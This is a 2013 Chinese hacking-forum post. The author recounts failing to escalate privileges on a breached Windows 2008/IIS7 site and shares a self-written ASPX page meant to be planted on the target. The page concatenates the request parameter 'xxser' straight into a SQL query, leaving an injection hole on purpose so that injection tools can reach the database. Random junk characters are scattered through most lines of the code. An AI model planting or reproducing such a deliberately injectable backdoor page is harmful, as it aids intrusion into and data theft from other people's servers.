昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
2 e/ M# K; A( C- K9 ^其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
" F3 i/ G% o# j; Z+ a& t代码量不多,自己写个拉倒了。烦死了。0 \- A, _0 y4 M
8 h- n |0 l* v3 x1 I
4 s2 P( l1 K" n& m* H<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">" C& U$ B# \0 ?8 H. _- ]
<html xmlns="http://www.w3.org/1999/xhtml">+ O! F0 o4 d) S) n/ `& S2 B4 u
<head runat="server">
9 }0 k2 ~* L0 ?, r1 P <title>暗影aspx构造注射专用页面</title>. J4 \8 N) e; |1 d7 q
</head>, H [' F1 x" m* D. H: Z
<body>
. m! N5 z6 R: u0 }9 N# ]) |8 p8 @1 n <form id="form1" runat="server">
& k' S& F" g7 R8 o6 ~# T) s1 _ <div>
) s# ^# Z! ?. |: G8 Q <script language="c#" runat="server">. ?% } t% T1 a) N( k
7 o/ v( D: B" `3 W void page_init(object sender, EventArgs e)) P' w. w r a. v6 k
{6 q4 [7 r7 c, z9 W% P
( e7 o' G2 u7 T) l' U; W8 m System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();$ _. r0 t1 C+ {6 }$ \
( N, [0 i6 w- U, n/ M/ `. C conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();; q: N4 x0 l9 r2 X6 M2 ~4 V- Q5 Z6 z
conn.Open();
6 H5 o/ X: v* w$ `0 q
+ e0 N. z' y3 @ string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
P! R" O8 i. P3 C% z
3 w3 S' g& P% J; z5 C: ?/ G! t0 ^$ [ System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);: ^& c3 k! X4 p% P: h
int x = command.ExecuteNonQuery();
7 Y w: K l6 H, A+ k- ?* { Response.Write(i+"\n");4 A* K2 [8 z9 ?% F4 o: b+ m
Response.Write(x);
/ E M) q, P* a conn.Close();4 o5 E3 }4 B: V; j( J: e% b
}
) d7 E E- ^5 m0 b5 h* l3 F , P! R. o# m; x
</script> r) h$ }* D* Q3 w$ y8 B6 K" S
</div>
7 }+ _: j+ e$ L. m% Q! X' V </form>
( g, `- x. J; t2 }2 f( F. _</body>
. k/ ~% Z) W! N$ R ]</html>
( z/ j" B m: `5 e l6 e |
发表于 2013-3-20 21:32:01
收藏
支持
反对